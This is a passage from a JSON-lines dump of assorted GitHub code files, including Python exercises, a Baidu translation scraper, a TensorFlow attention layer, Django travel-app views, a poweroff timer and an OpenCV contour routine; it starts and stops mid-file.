self.rnn.a_J.dot(self.dadw) + self.papw\n\n def get_rec_grads(self):\n \"\"\"Calculates recurrent grads using Eq. 
(2), reshapes into original\n matrix form.\"\"\"\n\n return self.q.dot(self.dadw).reshape((self.n_h, self.m), order='F')\n\n def reset_learning(self):\n \"\"\"Resets learning algorithm by setting influence matrix to 0.\"\"\"\n\n self.dadw *= 0\n","repo_name":"omarschall/vanilla-rtrl","sub_path":"learning_algorithms/RTRL.py","file_name":"RTRL.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"15975847705","text":"#!/usr/bin/python3\n\"\"\"model Base\"\"\"\nimport json\n\n\nclass Base:\n \"\"\"private class attribute \"\"\"\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"constructor\"\"\"\n\n if id is not None:\n self.id = id\n\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"returns the JSON string representation\"\"\"\n if list_dictionaries is None:\n return \"[]\"\n else:\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"writes the JSON string representation\"\"\"\n file_n = cls.__name__ + \".json\"\n new_list = []\n\n with open(file_n, \"w\", encoding='utf-8') as file:\n if list_objs is None:\n file.write(cls.to_json_string([]))\n else:\n for a in list_objs:\n new_list.append(a.to_dictionary())\n cont = cls.to_json_string(new_list)\n file.write(cont)\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"return the list of the JSON string representation\"\"\"\n if json_string is None or json_string == []:\n return []\n else:\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"return an instancewith all attributes\"\"\"\n if cls.__name__ == \"Square\":\n new = cls(1, 0, 0)\n\n if cls.__name__ == \"Rectangle\":\n new = cls(1, 1, 0, 0)\n\n new.update(**dictionary)\n return new\n\n @classmethod\n def load_from_file(cls):\n \"\"\"return a list of instance\"\"\"\n filename = cls.__name__ + \".json\"\n try:\n with open(filename, encoding=\"utf-8\") as file:\n content = file.read()\n data = cls.from_json_string(content)\n lst = []\n for i in data:\n lst.append(cls.create(**i))\n return lst\n except FileNotFoundError:\n return []\n\n @classmethod\n def save_to_file_csv(cls, list_objs):\n \"\"\"writes the JSON string representation\"\"\"\n file_n = cls.__name__ + \".csv\"\n new_list = []\n\n with open(file_n, \"w\", encoding='utf-8') as file:\n if list_objs is None:\n file.write(cls.to_json_string([]))\n else:\n for a in list_objs:\n new_list.append(a.to_dictionary())\n cont = cls.to_json_string(new_list)\n file.write(cont)\n\n @classmethod\n def load_from_file_csv(cls):\n filename = cls.__name__ + \".csv\"\n try:\n with open(filename, encoding=\"utf-8\") as file:\n content = file.read()\n data = cls.from_json_string(content)\n lst = []\n for i in data:\n lst.append(cls.create(**i))\n return lst\n except FileNotFoundError:\n return []\n","repo_name":"Caroll1889/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13332790897","text":"import pickle\n\nimport pkg_resources\n\n\nclass FourCornerMethod(object):\n def __init__(self):\n data_file = pkg_resources.resource_filename(__name__, \"data/data.pkl\")\n\n with open(data_file, 'rb') as fd:\n self.data = pickle.load(fd)\n\n def query(self, 
input_char, default=None):\n return self.data.get(input_char, default)\n\n\nif __name__ == \"__main__\":\n fcm = FourCornerMethod()\n result = fcm.query('名')\n\n print(result)\n","repo_name":"howl-anderson/four_corner_method","sub_path":"four_corner_method/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"81"} +{"seq_id":"20443324298","text":"# -*- coding:utf-8 -*-\n# email:bingchengzhou@foxmail.com\n# create: 2020/12/14\nimport os\nimport glob\nfrom natsort import natsorted\n\n\ndef get_model_name(name):\n name_list = name.split('_')\n class_name = \"\"\n for name in name_list:\n class_name += \"{}{}\".format(name[0].upper(), name[1:])\n return class_name\n\n\ndef get_trainer_name(name):\n return \"{}{}Trainer\".format(name[0].upper(), name[1:])\n\n\ndef get_predictor_name(name):\n return \"{}{}Predictor\".format(name[0].upper(), name[1:])\n\n\ndef get_file_list(folder_path: str, p_postfix: list = None, sub_dir: bool = True) -> list:\n \"\"\"\n 获取所给文件目录里的指定后缀的文件,读取文件列表目前使用的是 os.walk 和 os.listdir ,这两个目前比 pathlib 快很多\n :param filder_path: 文件夹名称\n :param p_postfix: 文件后缀,如果为 [.*]将返回全部文件\n :param sub_dir: 是否搜索子文件夹\n :return: 获取到的指定类型的文件列表\n \"\"\"\n assert os.path.exists(folder_path) and os.path.isdir(folder_path)\n if p_postfix is None:\n p_postfix = ['.jpg']\n if isinstance(p_postfix, str):\n p_postfix = [p_postfix]\n file_list = [x for x in glob.glob(folder_path + '/**/*.*', recursive=True) if\n os.path.splitext(x)[-1] in p_postfix or '.*' in p_postfix]\n return natsorted(file_list)\n\n","repo_name":"zhou3968322/dl-lab","sub_path":"utils/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11140957206","text":"def narendra(country=\"india\"):\n print(\" iam from \"+ country )\nnarendra(\"chaina\")\nnarendra(\"bangladesh\")\nnarendra(\"french\")\nnarendra()\ndef narendra1(school=\"dont\"):\n print(\"i go to \"+ school)\nnarendra1(\"collage\")\nnarendra1(\"bus\")\nnarendra1()\nnarendra1(\"daddy\")\n\n# # a=abs(6+7y)\n# # print(a) \n\n# # mylist=[True, True, False]\n# # x=all(mylist)\n# # print(x)\n\n\n# # x=ascii(\"my name is st\")\n\n\n\ndef myfunc(n):\n return lambda a:a*n\nname=myfunc(2)\nname1=myfunc(9)\n\n# # print(name(2))\n# # print(name1(1345)) \n\n\n\n\"\"\" def add(a,b):\n# c=a+b\n# return c\n# solution=add(1123,34567)\n# print(solution)\n\n\n# def fact(a,b=20):\n# print(a,b)\n# fact(8)or(3)\"\"\"\n\n\n\n\n# def display(a,b,c):\n# print(a,b,c)\n# display(c=67,b=8,a=45)\n\n\n# def display(*marks):\n# print(marks)\n# display(12,3,4,4,5,5,66,67,678,7,7,88889,9,) \n\n\n# a=int(input(\"enter value:\"))\n# b=int(input(\"enter value:\"))\n# c=a+b\n# print(c)\n\n# a=3+5j\n# print(abs(a))\n\n\n# def sum():\n# a=23\n# b=29\n# c=a+b\n# return c\n# print(sum())\n\n \n\n\n\n# def my_function(name):\n# print(\"hi\", name)\n# my_function(\"jaswik\")\n\n\n\n# def sum(a,b):\n# return a+b\n# a=int(input(\"enter value of a:\"))\n# b=int(input(\"enter value of b:\"))\n \n \n# print(\"te sum of a,b is\",sum(a,b))\n\n\n\n\n# def change_list(list1):\n# list1.append(20)\n# list1.append(27)\n# print(\"list inside function:\",list1)\n# list1=[20,4,5,6,78,]\n# change_list(list1)\n# print(\"out side function :\", list1) \n\n\n# positional arguments\n\nfrom os import name\n\n\ndef function(school):\n name=\"hi \"+ school\n return 
name\nschool=input(\"enter the school::::::\")\nprint(function(school))\n\n","repo_name":"Narendra-1997/Python-Basic-Programs","sub_path":"practiceprograms/function12.py","file_name":"function12.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28155564977","text":"# RecebeR o número de minutos atuais\nminutos = int(input(\"Digite o número de minutos atuais: \"))\n\n# CalculaR o fatorial dos minutos\nfatorial = 1\ni = 1\nwhile i <= minutos:\n fatorial *= i\n i += 1\n\n# Criar a senha \"LIBERDADE\" seguida do fatorial dos minutos\nsenha = \"LIBERDADE\" + str(fatorial)\n\n# Exibir a senha na tela\nprint(\"Senha para desbloqueio:\", senha)\n","repo_name":"Emily-Sousa/FIAP--ADS-1TDSOC-2023","sub_path":"aula1-python-exercicios/RM552540_EXO4.py","file_name":"RM552540_EXO4.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71634853064","text":"#! /usr/bin/env python3\n# coding: utf-8\nimport json\nimport re\nimport sys\nimport os\n\nimport requests\nimport execjs\nfrom Fucking.fuck import dbcache\nfrom Fucking.fuck import fucking_cmd\n\nurl = \"https://fanyi.baidu.com/v2transapi?from=en&to=zh\"\nver = sys.version.split(\" \")[0].split(\".\")[1]\nif int(ver) >= 5:\n exception = json.decoder.JSONDecodeError\nelse:\n exception = ValueError\n\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/78.0.3904.108 Safari/537.36\",\n \"Referer\": \"https://fanyi.baidu.com/\",\n \"Origin\": \"https://fanyi.baidu.com\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-origin\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Content-type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"dnt\": \"1\"\n}\n\nformdata = {\n \"from\": \"en\",\n \"to\": \"zh\",\n \"query\": \"\",\n \"transtype\": \"realtime\",\n \"simple_means_flag\": \"3\",\n \"sign\": \"\",\n \"token\": \"\"\n}\n\n\nsession = requests.session()\n\n\ndef _fetch_local(keyword):\n local_res = dbcache.lookup(keyword)\n if local_res:\n return prettify(local_res)\n else:\n result = parse_data(keyword, _fetch_data(keyword))\n if not result:\n return False\n dbcache.save(result)\n return result\n\n\ndef prettify(local_data):\n data = local_data[0]\n result = {\n \"word\": data[0],\n \"symbols\": data[1],\n \"means\": data[2]\n }\n result.update({\"local\": True})\n return result\n\n\ndef fetch(keyword):\n web = fucking_cmd.get_cmd()['force'] | fucking_cmd.get_cmd()['update']\n if web:\n data = _fetch_data(keyword)\n return parse_data(keyword, data)\n else:\n return _fetch_local(keyword)\n\n\ndef _fetch_data(keyword):\n formdata['query'] = keyword\n try:\n s = requests.Session()\n s.get(\"https://fanyi.baidu.com/\")\n r = s.get(\"https://fanyi.baidu.com/\")\n # Get token\n gtk = re.findall(r\"window.gtk = '(.*?)';\", r.text)[0]\n sign = get_sign(keyword, gtk)\n formdata['sign'] = sign\n formdata.update({\n \"token\": re.findall(r\"token: '(.*?)',\", r.text)[0],\n })\n res = s.post(url, data=formdata, headers=header)\n except ConnectionError:\n print(\"Connection error.\")\n return False\n return res.text\n\n\ndef get_sign(word, gtk):\n with open(path.join(path.dirname(__file__), \"fuck\", \"cal_sign.js\")) as f:\n data = f.read()\n sign = execjs.compile(data).call(\"e\", word, gtk)\n return sign\n\n\ndef parse_data(word, data):\n json_dict = 
json.loads(data)\n if not json_dict['dict_result']:\n return False\n key = json_dict['dict_result']['simple_means']['symbols']\n hassymbol = 'ph_am' in key[0]\n result = {\n \"word\": word,\n \"symbols\": str({'美音': key[0]['ph_am'], \"英音\": key[0]['ph_en']}) if hassymbol else \"False\",\n \"means\": str(key[0]['parts']),\n \"local\": False\n }\n if fucking_cmd.get_cmd()['update']:\n dbcache.save(result)\n return result\n\n\ndef output(result):\n if not result:\n print(\"You sure your spell is right?\")\n exit(-5)\n if result['local']:\n print(\"From local cache:\\t***%s***\" % result['word'])\n else:\n print(\"From Internet: \\t***%s***\" % result['word'])\n try:\n symbols = json.loads(result['symbols'].replace(\"'\", \"\\\"\"))\n for k, v in symbols.items():\n if v:\n sys.stdout.write(\"%s: [ %s ]\\t\" % (k, v))\n except exception:\n sys.stdout.write(\"音标中含有非法字符!\")\n print(\"\")\n means = \"{\\\"means\\\": %s}\" % result['means'].replace(\"\\'\", \"\\\"\")\n print(\"释义:\")\n try:\n means = json.loads(means)['means']\n for mean in means:\n if 'part' in mean:\n print(\"\\t{0:3} {1}\".format(mean['part'], mean['means']))\n elif 'part_name' in mean:\n print(\"\\t来源于网络的结果: {0}\".format(mean['means']))\n except exception:\n print(means)\n\n\ndef main():\n dbcache.init()\n result = fetch(fucking_cmd.parse_cmd())\n output(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yaoxuannn/Python_Tools","sub_path":"Fucking/fucking.py","file_name":"fucking.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"81"} +{"seq_id":"71291646985","text":"#Boa:Dialog:AboutDialog\r\n\r\nfrom wxPython.wx import *\r\n\r\ndef create(parent):\r\n return AboutDialog(parent)\r\n\r\n[wxID_ABOUTDIALOG, wxID_ABOUTDIALOGALLRIGHTS, wxID_ABOUTDIALOGBUTTON1, \r\n wxID_ABOUTDIALOGSTATICTEXT1, wxID_ABOUTDIALOGSTATICTEXT2, \r\n] = map(lambda _init_ctrls: wxNewId(), range(5))\r\n\r\nclass AboutDialog(wxDialog):\r\n def _init_utils(self):\r\n # generated method, don't edit\r\n pass\r\n\r\n def _init_ctrls(self, prnt):\r\n # generated method, don't edit\r\n wxDialog.__init__(self, id=wxID_ABOUTDIALOG, name='AboutDialog',\r\n parent=prnt, pos=wxPoint(597, 303), size=wxSize(431, 217),\r\n style=wxDEFAULT_DIALOG_STYLE, title='About SDE')\r\n self._init_utils()\r\n self.SetClientSize(wxSize(423, 183))\r\n self.Center(wxBOTH)\r\n\r\n self.button1 = wxButton(id=wxID_ABOUTDIALOGBUTTON1, label='Close',\r\n name='button1', parent=self, pos=wxPoint(144, 128),\r\n size=wxSize(136, 24), style=0)\r\n self.button1.SetToolTipString('Closes this dialog')\r\n EVT_BUTTON(self.button1, wxID_ABOUTDIALOGBUTTON1, self.OnButton1Button)\r\n\r\n self.staticText1 = wxStaticText(id=wxID_ABOUTDIALOGSTATICTEXT1,\r\n label='Sylphis Development Environment', name='staticText1',\r\n parent=self, pos=wxPoint(128, 24), size=wxSize(161, 13), style=0)\r\n\r\n self.staticText2 = wxStaticText(id=wxID_ABOUTDIALOGSTATICTEXT2,\r\n label='Copyright (c) 2003 Harry Kalogirou', name='staticText2',\r\n parent=self, pos=wxPoint(128, 72), size=wxSize(161, 13), style=0)\r\n\r\n self.allrights = wxStaticText(id=wxID_ABOUTDIALOGALLRIGHTS,\r\n label='All Rights Reserved', name='allrights', parent=self,\r\n pos=wxPoint(160, 88), size=wxSize(93, 13), style=0)\r\n\r\n def __init__(self, parent):\r\n self._init_ctrls(parent)\r\n\r\n def OnButton1Button(self, event):\r\n 
self.Close()\r\n","repo_name":"harkal/sylphis3d","sub_path":"runtime/base/devenv/AboutDialog.py","file_name":"AboutDialog.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"81"} +{"seq_id":"2597232238","text":"from __future__ import annotations\n\nfrom fastapi.requests import Request\nfrom fastapi.websockets import WebSocket\n\nfrom core.config import get_site_settings\nfrom schemas import IntegrationUserSchema\nfrom store.base import BaseAccessor\n\n\nclass UserAccessor(BaseAccessor):\n async def get_user_request(self, request: Request) -> IntegrationUserSchema:\n base_url = get_site_settings().AUTH_SITE_BASE_URL\n async with self.store.aiohttp_accessor.session.get(\n url=f\"{base_url}/api.user/cookie/current\",\n cookies=request.cookies,\n raise_for_status=True,\n ) as response:\n json = await response.json()\n\n return IntegrationUserSchema.parse_obj(json)\n\n async def get_user_websocket(self, websocket: WebSocket) -> IntegrationUserSchema:\n base_url = get_site_settings().AUTH_SITE_BASE_URL\n async with self.store.aiohttp_accessor.session.get(\n url=f\"{base_url}/api.user/cookie/current\",\n cookies=websocket.cookies,\n raise_for_status=True,\n ) as response:\n json = await response.json()\n\n return IntegrationUserSchema.parse_obj(json)\n","repo_name":"toymaj/like-games-backend","sub_path":"app/poker/app/store/integration/user/accessor.py","file_name":"accessor.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71618905544","text":"import os\nimport sys\nimport time\n\nTIME_LIMIT = 6*3600 # server runtime limit in s\n\ndef get_uptime():\n with open('/proc/uptime', 'r') as f:\n uptime_seconds = int(float(f.readline().split()[0]))\n\n return uptime_seconds\n\ndef poweroff(): \n print('poweroff-timer: os.system(\"poweroff\")', file=sys.stderr)\n os.system(\"poweroff\")\n\nwhile True:\n uptime = get_uptime()\n if uptime >= TIME_LIMIT:\n print('poweroff-timer: time limit of ' + str(TIME_LIMIT/60) + 'min exceeded, executing poweroff now', file=sys.stderr)\n poweroff()\n else:\n print('poweroff-timer systemd service: poweroff in ' + str(TIME_LIMIT - uptime) + 's', file=sys.stderr)\n time.sleep(300)\n\n","repo_name":"clivegross/poweroff-timer","sub_path":"poweroff-timer.py","file_name":"poweroff-timer.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42320432649","text":"import unittest\n\n\ndef mergeSort(ls):\n if len(ls) <= 1:\n return ls\n\n ans = []\n\n mid = len(ls) // 2\n left = mergeSort(ls[:mid])\n right = mergeSort(ls[mid:])\n\n i = 0\n j = 0\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n ans.append(left[i])\n i += 1\n else:\n ans.append(right[j])\n j += 1\n\n while i < len(left):\n ans.append(left[i])\n i += 1\n\n while j < len(right):\n ans.append(right[j])\n j += 1\n\n return ans\n\n\nclass TestMergeSort(unittest.TestCase):\n def test_simple(self):\n self.assertEqual(mergeSort([1, 5, 2, 3, 4, 8, 1]), [1, 1, 2, 3, 4, 5, 8])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NjengaSaruni/LeetCode-Python-Solutions","sub_path":"Sorting/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39243449156","text":"# -*- 
coding: utf-8 -*-\nimport config\n\nimport tensorflow._api.v2.compat.v1 as tf\ntf.disable_v2_behavior()\n\n\nclass AttentionHead(object):\n def __init__(self, head_dim, layer_index, head_index):\n self.embed_dim = config.EMBED_SIZE\n\n with tf.variable_scope(\"multi-head__%s_%s\" % (layer_index, head_index)):\n self.q = tf.get_variable(name=\"query\", shape=[self.embed_dim, head_dim], dtype=tf.float32,\n initializer=tf.truncated_normal_initializer(stddev=0.01))\n self.k = tf.get_variable(name=\"key\", shape=[self.embed_dim, head_dim], dtype=tf.float32,\n initializer=tf.truncated_normal_initializer(stddev=0.01))\n self.v = tf.get_variable(name=\"value\", shape=[self.embed_dim, head_dim], dtype=tf.float32,\n initializer=tf.truncated_normal_initializer(stddev=0.01))\n\n # input_embed is of shape [batch_size, seq_len, embed_size], seq_len is the length of sequence\n def forward(self, input_embed):\n # the dimension of query, key, value is head_dim = embed_size / num_attention_heads\n query = tf.matmul(input_embed, self.q)\n key = tf.matmul(input_embed, self.k)\n value = tf.matmul(input_embed, self.v)\n\n n = tf.shape(key)[-1] # = tf.shape(input_embed)[1]\n\n # score is of shape [seq_len, seq_len], ignoring batch_size\n scores = tf.matmul(query, key, transpose_b=True) / tf.sqrt(tf.to_float(n))\n weights = tf.nn.softmax(scores)\n # attention_weighted_embed is of shape[seq_len, embed_size], ignoring batch_size, is value weighted by weights\n attention_weighted_embed = tf.matmul(weights, value)\n\n return attention_weighted_embed\n\n\nclass MultiHeadAttention(object):\n def __init__(self, layer_index):\n self.embed_dim = config.EMBED_SIZE\n\n head_dim = int(self.embed_dim / config.NUM_ATTENTION_HEAD)\n self.heads = [AttentionHead(head_dim, layer_index, head_index) for head_index in range(config.NUM_ATTENTION_HEAD)]\n\n def forward(self, input_embed):\n # each head is of shape [seq_len, head_dim], ignoring batch_size, after concat, head_dim changed to embed_size\n multi_heads = tf.concat([head.forward(input_embed) for head in self.heads], axis=-1)\n linearized_multi_heads = tf.layers.dense(multi_heads, self.embed_dim)\n\n return linearized_multi_heads\n","repo_name":"knowledgehacker/text_classifier","sub_path":"multi_head.py","file_name":"multi_head.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41052237529","text":"import pandas as pd\nimport numpy as np\n\n\ndef delete_same_day_visit_value(index, df_rows):\n row = np.copy(df_rows[index])\n row[11] = ' '\n if row[-2] == 'same day visit':\n row[-2] = ' '\n return row\n\n\ndef construct_new_tuple(index, df_rows):\n row = df_rows[index]\n\n cust_ID = row[0]\n date = row[1]\n month = row[2]\n pe_planned, pe_executed, pe_adhoc = ' ', ' ', ' ' # кодирањето на PE атрибутите за екстерна евалуација\n terr_ID = row[6]\n sales_group = row[7]\n sape = np.nan\n ape = row[9]\n fpe = np.nan\n sdv = 'same day visit'\n overdue = ' '\n underdue = ' '\n ok = ' '\n not_ok = ' '\n status = ' '\n overdue_days = ' '\n\n new_tuple = np.array([cust_ID, date, month, pe_planned, pe_executed, pe_adhoc, terr_ID, sales_group,\n sape, ape, fpe, sdv, overdue, underdue, ok, not_ok, status, overdue_days], dtype=object)\n\n return new_tuple\n\n\ndef split_row(index, df_rows):\n external_eval_tup = construct_new_tuple(index, df_rows)\n row = np.copy(df_rows[index])\n row[9] = np.nan\n return row, external_eval_tup\n\n\ndef process_row(index, df_rows):\n row = 
df_rows[index]\n\n if row[11] != 'same day visit':\n return [row]\n\n if np.isnan(row[8]):\n fixed_row = delete_same_day_visit_value(index, df_rows)\n return [fixed_row]\n\n orig_tuple_fixed, eval_tuple = split_row(i, df_rows)\n return [orig_tuple_fixed, eval_tuple]\n\n\nif __name__ == '__main__':\n df = pd.read_csv('../../data/dataset/Spenser_1_7_8_fixed_1n1_leftovers.tsv', sep='\\t')\n df_rows = df.values\n\n new_df_rows = []\n\n for i in range(len(df_rows)):\n ret = process_row(i, df_rows)\n new_df_rows.extend(ret)\n\n new_df = pd.DataFrame(data=new_df_rows, columns=df.columns)\n new_df.to_csv('../../data/dataset/Spenser_1_7_9_split_same_day_visit_tuples.tsv', sep='\\t', index=None)\n","repo_name":"jStojcheski/kontrola-na-komercijalisti","sub_path":"scripts/(re)formatting/split_same_day_visit_tuples.py","file_name":"split_same_day_visit_tuples.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74881541064","text":"# import requests\n#\n# url = 'http://192.168.151.140:8075/WebReport/ReportServer?reportlet=ikahe_kanban%2Fxqhz.cpt'\n#\n# res = requests.get(url)\n# print(res.text)\n\nfrom selenium import webdriver\nimport time\n\nprint(\"start....\\n\")\ndriver = webdriver.PhantomJS()\ndriver.set_window_size(1400, 700)\nurl = 'http://192.168.151.140:8075/WebReport/ReportServer?reportlet=ikahe_kanban%2F%5B7ef4%5D%5B4fee%5D%5B62a5%5D%5B8868%5D.cpt'\nres = driver.get(url)\nprint(res)\ntime.sleep(10)\ndriver.save_screenshot(r\"D:\\桌面\\repair.png\")\nprint(\"ok!\\n\")","repo_name":"Boomshakal/spider","sub_path":"PhantomJS_test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4805262251","text":"\"\"\"\nFinal exam. 
Distributed and Network Programming.\nAuthor: Danis Alukaev\nEmail: d.alukaev@innopolis.university\nGroup: B19-DS-01\n\"\"\"\n\nfrom xmlrpc.server import SimpleXMLRPCServer\nimport multiprocessing\n\nfrom configs import HOST, PORT\n\n\nclass MyQueue(multiprocessing.Process):\n\n def __init__(self):\n super().__init__()\n # set port number\n self.port = PORT\n\n self.queue = []\n\n # create RPC object to serve requests\n self.server_obj = SimpleXMLRPCServer((HOST, self.port),\n logRequests=False,\n allow_none=True)\n self.server_obj.register_function(self.put)\n self.server_obj.register_function(self.pick)\n self.server_obj.register_function(self.pop)\n self.server_obj.register_function(self.size)\n\n def run(self):\n # run RPC server\n self.server_obj.serve_forever()\n\n def put(self, str):\n self.queue.append(str)\n return True\n\n def pick(self):\n if len(self.queue) == 0:\n return None\n return self.queue[0]\n\n def pop(self):\n if len(self.queue) == 0:\n return None\n return self.queue.pop(0)\n\n def size(self):\n return len(self.queue)\n\n\nif __name__ == '__main__':\n my_queue = MyQueue()\n my_queue.start()\n","repo_name":"DanisAlukaev/Distributed-and-Network-Programming","sub_path":"Final exam/Task 1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70357290185","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\n\ndef main(request):\n return render(request, 'belt_exam/login.html')\n\ndef register(request):\n errors = User.objects.registration_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/main')\n else:\n hashed = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt()).decode()\n user = User.objects.create(name=request.POST['name'], username=request.POST['username'], password=hashed)\n request.session['id'] = user.id\n return redirect('/travels')\n\ndef login(request):\n errors = User.objects.login_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/main')\n else:\n user = User.objects.get(username = request.POST['username'])\n request.session['id'] = user.id\n return redirect('/travels')\n\ndef trips(request):\n if 'id' not in request.session:\n messages.error(request, \"Please login or register\")\n return redirect('/main')\n else:\n user = User.objects.get(id=request.session['id'])\n trips = Trip.objects.all()\n my_trips = user.trips.all()\n other_trips = trips.difference(my_trips)\n\n context = {\n 'user' : user,\n 'my_trips' : my_trips,\n 'other_trips' : other_trips\n }\n return render(request, 'belt_exam/trips.html', context)\n\n\ndef logout(request):\n request.session.clear()\n return redirect('/main')\n\ndef display_trip(request,trip_id):\n trip = Trip.objects.get(id = trip_id)\n user = User.objects.get(id = trip.creator.id)\n joiners = trip.trips.all().exclude(id = user.id)\n context = {\n 'trip' : trip,\n 'joiners' : joiners\n }\n return render(request, 'belt_exam/display.html', context)\n\ndef add_trip(request):\n user = User.objects.get(id=request.session['id'])\n context = {\n 'user' : user\n }\n return render(request, 'belt_exam/add_trip.html', context)\n\ndef create(request):\n user = User.objects.get(id=request.session['id'])\n errors = 
Trip.objects.trip_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/travels/add')\n else:\n trip = Trip.objects.create(destination=request.POST['destination'], description=request.POST['description'], trip_start=request.POST['trip_start'], trip_end=request.POST['trip_end'], creator = user)\n user.trips.add(trip)\n return redirect('/travels')\n\ndef join(request, trip_id):\n user = User.objects.get(id = request.session['id'])\n trip = Trip.objects.get(id=trip_id)\n user.trips.add(trip)\n return redirect('/travels')\n\n","repo_name":"ericschweiger/newProject","sub_path":"apps/belt_exam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"377968695","text":"\"\"\"\ngenuisetup\n\nCreated by: Martin Sicho\nOn: 4/28/20, 4:38 PM\n\"\"\"\nimport importlib\n\nfrom genui.utils.inspection import getSubclassesFromModule\n\n\ndef discoverExporters(app, exporters_module=\"exporters\"):\n from .exporters.base import BaseMolSetExporter\n from .models import MolSetExporter\n\n name = f\"{app}.{exporters_module}\"\n module = None\n try:\n module = importlib.import_module(name)\n except ModuleNotFoundError as err:\n if name not in repr(err):\n raise err\n else:\n return\n\n for exporter in getSubclassesFromModule(BaseMolSetExporter, module):\n if exporter == BaseMolSetExporter:\n continue\n else:\n instance = MolSetExporter.objects.get_or_create(\n name=exporter.name\n )[0]\n instance.classPath = f\"{name}.{exporter.__name__}\"\n instance.save()\n print(f\"Found molecule set exporter: {instance}\")\n\n\ndef setup(*args, **kwargs):\n from genui.utils.init import createGroup\n from genui import apps\n from . import models\n from . 
import signals\n\n for app in apps.all_():\n discoverExporters(app)\n\n createGroup(\n \"GenUI_Users\",\n [\n models.MolSet,\n models.Activity,\n models.ActivitySet,\n models.Molecule,\n models.MolSetFile,\n models.MolSetExport\n ],\n force=kwargs['force']\n )\n\n createGroup(\n \"GenUI_Users\",\n [\n models.ActivityTypes,\n models.ActivityUnits,\n models.MoleculePic,\n models.PictureFormat,\n models.MolSetExporter\n ],\n permissions=['view'],\n force=kwargs['force']\n )\n\n","repo_name":"martin-sicho/genui","sub_path":"src/genui/compounds/genuisetup.py","file_name":"genuisetup.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"81"} +{"seq_id":"10936065455","text":"import cv2\nimport numpy as np\nimport glob\nimport os\n\n\n# region 1\ndef DrawContour():\n img1 = cv2.imread(\"Datasets/Q1_Image/coin01.jpg\")\n img2 = cv2.imread(\"Datasets/Q1_Image/coin02.jpg\")\n\n img1_g = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n img2_g = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\n (thresh, img1_b) = cv2.threshold(img1_g, 127, 255, cv2.THRESH_BINARY)\n (thresh, img2_b) = cv2.threshold(img2_g, 127, 255, cv2.THRESH_BINARY)\n\n img1_gaussian = cv2.GaussianBlur(img1_b, (11, 11), 0)\n img2_gaussian = cv2.GaussianBlur(img2_b, (13, 13), 0)\n\n img1_edge = cv2.Canny(img1_gaussian, 0, 200)\n img2_edge = cv2.Canny(img2_gaussian, 0, 300)\n\n contours1, hierarchy1 = cv2.findContours(\n img1_edge, 